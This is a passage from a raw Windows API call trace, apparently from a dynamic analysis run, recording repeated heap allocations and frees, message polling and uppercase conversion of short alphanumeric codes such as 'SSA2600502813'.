lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18cc1) returned 0x2aae878 [0210.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50eb020 | out: hHeap=0x2af0000) returned 1 [0210.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18cc1) returned 0x37c0048 [0210.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18cc1) returned 0x2aae878 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.617] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0210.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18cc1) returned 0x2aae878 [0210.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18cc1) returned 0x37d8d18 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0210.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0210.621] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0210.625] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.625] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0210.626] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0210.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e00 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.626] HeapFree (in: 